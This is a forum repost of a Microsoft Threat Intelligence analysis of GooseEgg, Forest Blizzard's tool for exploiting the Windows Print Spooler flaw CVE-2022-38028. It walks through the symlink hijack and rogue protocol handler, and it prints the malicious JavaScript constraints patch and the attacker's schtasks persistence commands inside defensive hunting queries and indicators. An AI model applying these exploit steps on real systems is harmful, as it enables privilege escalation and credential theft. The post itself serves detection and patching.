Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Software
Security Apps
Microsoft Defender
Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials
Message
<blockquote data-quote="Microsoft Threat Intelligence" data-source="post: 1084530"><p>Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks. Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38028" target="_blank">CVE-2022-38028</a> vulnerability in Windows Print Spooler service by modifying a <a href="https://learn.microsoft.com/windows-hardware/drivers/print/javascript-constraints" target="_blank">JavaScript constraints file</a> and executing it with SYSTEM-level permissions. Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations. While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks.</p><p></p><p>Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as <a href="https://www.microsoft.com/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/" target="_blank">CVE-2023-23397</a>. Linked to the Russian General Staff Main Intelligence Directorate (GRU) by the <a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank">United States and United Kingdom governments</a>, Forest Blizzard primarily focuses on strategic intelligence targets and differs from other GRU-affiliated and sponsored groups, which Microsoft has tied to destructive attacks, such as <a href="https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" target="_blank">Seashell Blizzard (IRIDIUM)</a> and <a href="https://www.microsoft.com/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/" target="_blank">Cadet Blizzard (DEV-0586)</a>. Although Russian threat actors are known to have exploited a set of similar vulnerabilities known as PrintNightmare (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527" target="_blank">CVE-2021-34527</a> and <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675" target="_blank">CVE-2021-1675</a>), the use of GooseEgg in Forest Blizzard operations is a unique discovery that had not been previously reported by security providers. Microsoft is committed to providing visibility into observed malicious activity and sharing insights on threat actors to help organizations protect themselves. Organizations and users are to apply the <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028" target="_blank">CVE-2022-38028 security update</a> to mitigate this threat, while Microsoft Defender Antivirus detects the specific Forest Blizzard capability as HackTool:Win64/GooseEgg.</p><p></p><p>This blog provides technical information on GooseEgg, a unique Forest Blizzard capability. In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities. We also provide additional recommendations, detections, and indicators of compromise. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their accounts.</p><p></p><h2>Who is Forest Blizzard?</h2><p></p><p>Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East. Microsoft has also observed Forest Blizzard targeting media, information technology, sports organizations, and educational institutions worldwide. Since at least 2010, the threat actor’s primary mission has been to collect intelligence in support of Russian government foreign policy initiatives. The <a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank">United States and United Kingdom governments</a> have linked Forest Blizzard to Unit 26165 of the Russian Federation’s military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Other security researchers have used GRU Unit 26165, APT28, Sednit, Sofacy, and Fancy Bear to refer to groups with similar or related activities.</p><p></p><h3>GooseEgg</h3><p></p><p>Microsoft Threat Intelligence assesses Forest Blizzard’s objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information. While this actor’s TTPs and infrastructure specific to the use of this tool can change at any time, the following sections provide additional details on Forest Blizzard tactics, techniques, and procedures (TTPs) in past compromises.</p><p></p><h4>Launch, persistence, and privilege escalation</h4><p></p><p>Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. GooseEgg is typically deployed with a batch script, which we have observed using the name <em>execute.bat </em>and <em>doit.bat</em>. This batch script writes the file <em>servtask.bat,</em> which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run <em>servtask.bat</em>.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-1.-Batch-file-2.webp" alt="Screenshot of the batch file code" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 1. Batch file</em></p><p></p><p>The GooseEgg binary—which has included but is not limited to the file names <em>justice.exe</em> and <em>DefragmentSrv.exe</em>—takes one of four commands, each with different run paths. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity.</p><p></p><p>The first command issues a custom return code 0x6009F49F and exits; which could be indicative of a version number. The next two commands trigger the exploit and launch either a provided dynamic-link library (DLL) or executable with elevated permissions. The fourth and final command tests the exploit and checks that it has succeeded using the <em>whoami</em> command.</p><p></p><p>Microsoft has observed that the name of an embedded malicious DLL file typically includes the phrase “<em>wayzgoose”;</em> for example, <em>wayzgoose23.dll</em>. This DLL, as well as other components of the malware, are deployed to one of the following installation subdirectories, which is created under <em>C:\ProgramData</em>. A subdirectory name is selected from the list below:</p><p></p><ul> <li data-xf-list-type="ul">Microsoft</li> <li data-xf-list-type="ul">Adobe</li> <li data-xf-list-type="ul">Comms</li> <li data-xf-list-type="ul">Intel</li> <li data-xf-list-type="ul">Kaspersky Lab</li> <li data-xf-list-type="ul">Bitdefender</li> <li data-xf-list-type="ul">ESET</li> <li data-xf-list-type="ul">NVIDIA</li> <li data-xf-list-type="ul">UbiSoft</li> <li data-xf-list-type="ul">Steam</li> </ul><p></p><p>A specially crafted subdirectory with randomly generated numbers and the format string <em>\v%u.%02u.%04u</em> is also created and serves as the install directory. For example, a directory that looks like <em>C:\ProgramData\Adobe\v2.116.4405</em> may be created. The binary then copies the following driver stores to this directory:</p><p></p><ul> <li data-xf-list-type="ul"><em>C:\Windows\System32\DriverStore\FileRepository\pnms003.inf_*</em></li> <li data-xf-list-type="ul"><em>C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_*</em></li> </ul><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-2.-GooseEgg-binary-adding-driver-stores-to-an-actor-controlled-directory-2.webp" alt="Screenshot of code depicting the GooseEgg binary adding driver stores to an actor-controlled directory" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 2. GooseEgg binary adding driver stores to an actor-controlled directory</em></p><p></p><p>Next, registry keys are created, effectively generating a custom protocol handler and registering a new <a href="https://learn.microsoft.com/windows/win32/com/clsid-key-hklm" target="_blank">CLSID</a> to serve as the COM server for this “rogue” protocol. The exploit replaces the C: drive symbolic link in the object manager to point to the newly created directory. When the PrintSpooler attempts to load <em>C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_amd64_a7412a554c9bc1fd\MPDW-Constraints.js</em>, it instead is redirected to the actor-controlled directory containing the copied driver packages.</p><p></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-3.-Registry-key-creation-2.webp" alt="Screenshot of the registry key creation code" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 3. Registry key creation</em></p><p><img src="https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-4.-C-drive-symbolic-link-hijack-2.webp" alt="Screenshot of the C: drive symbolic link hijack code" class="fr-fic fr-dii fr-draggable " style="" /></p><p><em>Figure 4. C: drive symbolic link hijack</em></p><p></p><p>The “<em>MPDW-constraints.js</em>” stored within the actor-controlled directory has the following patch applied to the <em>convertDevModeToPrintTicket</em> function:</p><p></p><p></p><p></p><p>function convertDevModeToPrintTicket(devModeProperties, scriptContext, printTicket)</p><p>{try{ printTicket.XmlNode.load('rogue9471://go'); } catch (e) {}</p><p></p><p>The above patch to the <em>convertDevModeToPrintTicket</em> function invokes the “rogue” search protocol handler’s CLSID during the call to <em>RpcEndDocPrinter</em>. This results in the auxiliary DLL <em>wayzgoose.dll</em> launching in the context of the PrintSpooler service with SYSTEM permissions. <em>wayzgoose.dll</em> is a basic launcher application capable of spawning other applications specified at the command line with SYSTEM-level permissions, enabling threat actors to perform other malicious activities such as installing a backdoor, moving laterally through compromised networks, and remotely executing code.</p><p></p><h2>Recommendations</h2><p></p><p>Microsoft recommends the following mitigations defend against attacks that use GooseEgg.</p><p></p><p><strong>Reduce the Print Spooler vulnerability</strong></p><p></p><p>Microsoft released a security update for the Print Spooler vulnerability exploited by GooseEgg on <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028" target="_blank">October 11, 2022</a> and updates for PrintNightmare vulnerabilities on <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675" target="_blank">June 8, 2021</a> and <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" target="_blank">July 1, 2021</a>. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security. In addition, since the Print Spooler service isn’t required for domain controller operations, Microsoft recommends disabling the service on domain controllers. Otherwise, users can install available Windows security updates for Print Spooler vulnerabilities on Windows domain controllers before member servers and workstations. To help identify domain controllers that have the Print Spooler service enabled, Microsoft Defender for Identity has a <a href="https://learn.microsoft.com/defender-for-identity/security-assessment-print-spooler" target="_blank">built-in security assessment</a> that tracks the availability of Print Spooler services on domain controllers.</p><p></p><p><strong>Be proactively defensive</strong></p><p></p><ul> <li data-xf-list-type="ul">For customers, follow the credential hardening recommendations in our <a href="https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport?" target="_blank">on-premises credential theft overview</a> to defend against common credential theft techniques like LSASS access.</li> <li data-xf-list-type="ul">Run <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode" target="_blank">Endpoint Detection and Response (EDR) in block mode</a> so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. </li> <li data-xf-list-type="ul">Configure <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations" target="_blank">investigation and remediation</a> in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. </li> <li data-xf-list-type="ul">Turn on <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus" target="_blank">cloud-delivered protection</a> in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.</li> </ul><p></p><p>Microsoft Defender XDR customers can turn on the following <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction" target="_blank">attack surface reduction rule</a> to prevent common attack techniques used for GooseEgg. Microsoft Defender XDR detects the GooseEgg tool and raises an alert upon detection of attempts to exploit Print Spooler vulnerabilities regardless of whether the device has been patched.</p><p></p><ul> <li data-xf-list-type="ul"> <a href="https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem" target="_blank">Block credential stealing from the Windows local security authority subsystem (lsass.exe)</a></li> </ul><h2>Detecting, hunting, and responding to GooseEgg</h2><h3>Microsoft Defender XDR detections</h3><p></p><p><strong>Microsoft Defender Antivirus</strong></p><p></p><p>Microsoft Defender Antivirus detects threat components as the following malware:</p><p></p><ul> <li data-xf-list-type="ul">HackTool:Win64/GooseEgg</li> </ul><p></p><p><strong>Microsoft Defender for Endpoint</strong></p><p></p><p>The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.</p><p></p><ul> <li data-xf-list-type="ul">Possible exploitation of CVE-2021-34527</li> <li data-xf-list-type="ul">Possible source of PrintNightmare exploitation</li> <li data-xf-list-type="ul">Possible target of PrintNightmare exploitation attempt</li> <li data-xf-list-type="ul">Potential elevation of privilege using print filter pipeline service</li> <li data-xf-list-type="ul">Suspicious behavior by <em>spoolsv.exe</em></li> <li data-xf-list-type="ul">Forest Blizzard Actor activity detected</li> </ul><p></p><p><strong>Microsoft Defender for Identity</strong></p><p></p><p>The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.</p><p></p><ul> <li data-xf-list-type="ul">Suspected Windows Print Spooler service exploitation attempt (CVE-2021-34527 exploitation)</li> </ul><h3>Threat intelligence reports</h3><p></p><p>Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.</p><p></p><p><strong>Microsoft Defender Threat Intelligence</strong></p><p></p><ul> <li data-xf-list-type="ul"><a href="https://security.microsoft.com/intel-profiles/dd75f93b2a771c9510dceec817b9d34d868c2d1353d08c8c1647de067270fdf8?tid=72f988bf-86f1-41af-91ab-2d7cd011db47" target="_blank">Actor Profile: Forest Blizzard</a></li> <li data-xf-list-type="ul"><a href="https://security.microsoft.com/intel-explorer/articles/2005aadf?tid=72f988bf-86f1-41af-91ab-2d7cd011db47" target="_blank">Abuse of Windows Print Spooler for privilege escalation and persistence</a></li> </ul><h3>Hunting queries</h3><p></p><p><strong>Microsoft Sentinel</strong></p><p></p><p>Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <a href="https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy" target="_blank">Discover and deploy Microsoft Sentinel out-of-the-box content from Content hub</a>.</p><p></p><p><strong>Hunt for filenames, file extensions in ProgramData folder and file hash</strong></p><p></p><p></p><p></p><p>let filenames = dynamic(["execute.bat","doit.bat","servtask.bat"]);</p><p>DeviceFileEvents</p><p> | where TimeGenerated > ago(60d) // change the duration according to your requirement</p><p> | where ActionType == "FileCreated"</p><p> | where FolderPath == "C:\\ProgramData\\"</p><p> | where FileName in~ (filenames) or FileName endswith ".save" or FileName endswith ".zip" or ( FileName startswith "wayzgoose" and FileName endswith ".dll") or SHA256 == "7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9" // hash value of execute.bat/doit.bat/servtask.bat</p><p> | project TimeGenerated, DeviceId, DeviceName, ActionType, FolderPath, FileName, InitiatingProcessAccountName,InitiatingProcessAccountUpn</p><p></p><p><strong>Hunt for processes creating scheduled task creation</strong></p><p></p><p></p><p></p><p>DeviceProcessEvents</p><p>| where TimeGenerated > ago(60d) // change the duration according to your requirement</p><p>| where InitiatingProcessSHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 == "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" //hash value of justice.exe</p><p>| where InitiatingProcessSHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" or SHA256 == "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5" //hash value of DefragmentSrv.exe</p><p>or ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or</p><p> ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or</p><p> ProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or</p><p> ProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv" or</p><p> InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\servtask.bat /SC MINUTE" or</p><p> InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\execute.bat /SC MINUTE" or</p><p> InitiatingProcessCommandLine contains "schtasks /Create /RU SYSTEM /TN \\Microsoft\\Windows\\WinSrv /TR C:\\ProgramData\\doit.bat /SC MINUTE" or</p><p> InitiatingProcessCommandLine contains "schtasks /DELETE /F /TN \\Microsoft\\Windows\\WinSrv"</p><p>| project TimeGenerated, AccountName,AccountUpn,ActionType, DeviceId, DeviceName,FolderPath, FileName</p><p></p><p><strong>Hunt for JavaScript constrained file</strong></p><p></p><p></p><p></p><p>DeviceFileEvents</p><p> | where TimeGenerated > ago(60d) // change the duration according to your requirement</p><p> | where ActionType == "FileCreated"</p><p> | where FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"</p><p> | where FileName endswith ".js" or FileName == "MPDW-constraints.js"</p><p></p><p><strong>Hunt for creation of registry key / value events</strong></p><p></p><p></p><p></p><p>DeviceRegistryEvents</p><p> | where TimeGenerated > ago(60d) // change the duration according to your requirement</p><p> | where ActionType == "RegistryValueSet"</p><p> | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"</p><p> | where RegistryValueName has "(Default)"</p><p> | where RegistryValueData has "wayzgoose.dll" or RegistryValueData contains ".dll"</p><p></p><p> <strong>Hunt for custom protocol handler</strong></p><p></p><p></p><p></p><p>DeviceRegistryEvents</p><p> | where TimeGenerated > ago(60d) // change the duration according to your requirement</p><p> | where ActionType == "RegistryValueSet"</p><p> | where RegistryKey contains "HKEY_CURRENT_USER\\Software\\Classes\\PROTOCOLS\\Handler\\rogue"</p><p> | where RegistryValueName has "CLSID"</p><p> | where RegistryValueData contains "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}"</p><h3>Indicators of compromise</h3><p></p><p><strong>Batch script artifacts:</strong></p><p></p><ul> <li data-xf-list-type="ul"><em>execute.bat</em></li> <li data-xf-list-type="ul"><em>doit.bat</em></li> <li data-xf-list-type="ul"><em>servtask.bat</em></li> <li data-xf-list-type="ul">7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9</li> </ul><p></p><p><strong>GooseEgg artifacts:</strong></p><p></p><ul> <li data-xf-list-type="ul"><em>justice.pdb</em></li> <li data-xf-list-type="ul"><em>wayzgoose.pdb</em></li> </ul> <table style='width: 100%'><tr><td><strong>Indicator</strong></td><td><strong>Type</strong></td><td><strong>Description</strong></td></tr><tr><td>c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5</td><td>SHA-256</td><td>Hash of GooseEgg binary <em>DefragmentSrv.exe</em></td></tr><tr><td>6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f</td><td>SHA-256</td><td>Hash of GooseEgg binary <em>justice.exe</em></td></tr><tr><td>41a9784f8787ed86f1e5d20f9895059dac7a030d8d6e426b9ddcaf547c3393aa</td><td>SHA-256</td><td>Hash of <em>wayzgoose[%n].dll</em> – where %n is a random number</td></tr></table><h3>References</h3> <ul> <li data-xf-list-type="ul"><a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank">https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF</a></li> <li data-xf-list-type="ul"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527" target="_blank">CVE - CVE-2021-34527</a></li> <li data-xf-list-type="ul"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675" target="_blank">CVE - CVE-2021-1675</a></li> <li data-xf-list-type="ul"><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-074a" target="_blank">Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability | CISA</a></li> </ul><h3>Learn more</h3><p></p><p>For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <a href="https://aka.ms/threatintelblog" target="_blank">Threat intelligence | Microsoft Security Blog</a>.</p><p></p><p>To get notified about new publications and to join discussions on social media, follow us on LinkedIn at <a href="https://www.linkedin.com/showcase/microsoft-threat-intelligence" target="_blank">Microsoft Threat Intelligence | LinkedIn</a>, and on X (formerly Twitter) at <a href="https://twitter.com/MsftSecIntel" target="_blank">https://twitter.com/MsftSecIntel</a>.</p><p></p><p>To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: <a href="https://thecyberwire.com/podcasts/microsoft-threat-intelligence" target="_blank">https://thecyberwire.com/podcasts/microsoft-threat-intelligence</a>.</p><p></p><p>The post <a href="https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/" target="_blank">Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials</a> appeared first on <a href="https://www.microsoft.com/en-us/security/blog" target="_blank">Microsoft Security Blog</a>.</p></blockquote><p></p>
[QUOTE="Microsoft Threat Intelligence, post: 1084530"] Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks. Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the [URL='https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38028']CVE-2022-38028[/URL] vulnerability in Windows Print Spooler service by modifying a [URL='https://learn.microsoft.com/windows-hardware/drivers/print/javascript-constraints']JavaScript constraints file[/URL] and executing it with SYSTEM-level permissions. Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations. While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks. Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as [URL='https://www.microsoft.com/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/']CVE-2023-23397[/URL]. Linked to the Russian General Staff Main Intelligence Directorate (GRU) by the [URL='https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF']United States and United Kingdom governments[/URL], Forest Blizzard primarily focuses on strategic intelligence targets and differs from other GRU-affiliated and sponsored groups, which Microsoft has tied to destructive attacks, such as [URL='https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/']Seashell Blizzard (IRIDIUM)[/URL] and [URL='https://www.microsoft.com/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/']Cadet Blizzard (DEV-0586)[/URL]. Although Russian threat actors are known to have exploited a set of similar vulnerabilities known as PrintNightmare ([URL='https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527']CVE-2021-34527[/URL] and [URL='https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675']CVE-2021-1675[/URL]), the use of GooseEgg in Forest Blizzard operations is a unique discovery that had not been previously reported by security providers. Microsoft is committed to providing visibility into observed malicious activity and sharing insights on threat actors to help organizations protect themselves. Organizations and users are to apply the [URL='https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028']CVE-2022-38028 security update[/URL] to mitigate this threat, while Microsoft Defender Antivirus detects the specific Forest Blizzard capability as HackTool:Win64/GooseEgg. This blog provides technical information on GooseEgg, a unique Forest Blizzard capability. In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities. We also provide additional recommendations, detections, and indicators of compromise. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their accounts. [HEADING=1]Who is Forest Blizzard?[/HEADING] Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East. Microsoft has also observed Forest Blizzard targeting media, information technology, sports organizations, and educational institutions worldwide. Since at least 2010, the threat actor’s primary mission has been to collect intelligence in support of Russian government foreign policy initiatives. The [URL='https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF']United States and United Kingdom governments[/URL] have linked Forest Blizzard to Unit 26165 of the Russian Federation’s military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Other security researchers have used GRU Unit 26165, APT28, Sednit, Sofacy, and Fancy Bear to refer to groups with similar or related activities. [HEADING=2]GooseEgg[/HEADING] Microsoft Threat Intelligence assesses Forest Blizzard’s objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information. While this actor’s TTPs and infrastructure specific to the use of this tool can change at any time, the following sections provide additional details on Forest Blizzard tactics, techniques, and procedures (TTPs) in past compromises. [HEADING=3]Launch, persistence, and privilege escalation[/HEADING] Microsoft has observed that, after obtaining access to a target device, Forest Blizzard uses GooseEgg to elevate privileges within the environment. GooseEgg is typically deployed with a batch script, which we have observed using the name [I]execute.bat [/I]and [I]doit.bat[/I]. This batch script writes the file [I]servtask.bat,[/I] which contains commands for saving off/compressing registry hives. The batch script invokes the paired GooseEgg executable and sets up persistence as a scheduled task designed to run [I]servtask.bat[/I]. [IMG alt="Screenshot of the batch file code"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-1.-Batch-file-2.webp[/IMG] [I]Figure 1. Batch file[/I] The GooseEgg binary—which has included but is not limited to the file names [I]justice.exe[/I] and [I]DefragmentSrv.exe[/I]—takes one of four commands, each with different run paths. While the binary appears to launch a trivial given command, in fact the binary does this in a unique and sophisticated manner, likely to help conceal the activity. The first command issues a custom return code 0x6009F49F and exits; which could be indicative of a version number. The next two commands trigger the exploit and launch either a provided dynamic-link library (DLL) or executable with elevated permissions. The fourth and final command tests the exploit and checks that it has succeeded using the [I]whoami[/I] command. Microsoft has observed that the name of an embedded malicious DLL file typically includes the phrase “[I]wayzgoose”;[/I] for example, [I]wayzgoose23.dll[/I]. This DLL, as well as other components of the malware, are deployed to one of the following installation subdirectories, which is created under [I]C:\ProgramData[/I]. A subdirectory name is selected from the list below: [LIST] [*]Microsoft [*]Adobe [*]Comms [*]Intel [*]Kaspersky Lab [*]Bitdefender [*]ESET [*]NVIDIA [*]UbiSoft [*]Steam [/LIST] A specially crafted subdirectory with randomly generated numbers and the format string [I]\v%u.%02u.%04u[/I] is also created and serves as the install directory. For example, a directory that looks like [I]C:\ProgramData\Adobe\v2.116.4405[/I] may be created. The binary then copies the following driver stores to this directory: [LIST] [*][I]C:\Windows\System32\DriverStore\FileRepository\pnms003.inf_*[/I] [*][I]C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_*[/I] [/LIST] [IMG alt="Screenshot of code depicting the GooseEgg binary adding driver stores to an actor-controlled directory"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-2.-GooseEgg-binary-adding-driver-stores-to-an-actor-controlled-directory-2.webp[/IMG] [I]Figure 2. GooseEgg binary adding driver stores to an actor-controlled directory[/I] Next, registry keys are created, effectively generating a custom protocol handler and registering a new [URL='https://learn.microsoft.com/windows/win32/com/clsid-key-hklm']CLSID[/URL] to serve as the COM server for this “rogue” protocol. The exploit replaces the C: drive symbolic link in the object manager to point to the newly created directory. When the PrintSpooler attempts to load [I]C:\Windows\System32\DriverStore\FileRepository\pnms009.inf_amd64_a7412a554c9bc1fd\MPDW-Constraints.js[/I], it instead is redirected to the actor-controlled directory containing the copied driver packages. [IMG alt="Screenshot of the registry key creation code"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-3.-Registry-key-creation-2.webp[/IMG] [I]Figure 3. Registry key creation[/I] [IMG alt="Screenshot of the C: drive symbolic link hijack code"]https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2024/04/Figure-4.-C-drive-symbolic-link-hijack-2.webp[/IMG] [I]Figure 4. C: drive symbolic link hijack[/I] The “[I]MPDW-constraints.js[/I]” stored within the actor-controlled directory has the following patch applied to the [I]convertDevModeToPrintTicket[/I] function: function convertDevModeToPrintTicket(devModeProperties, 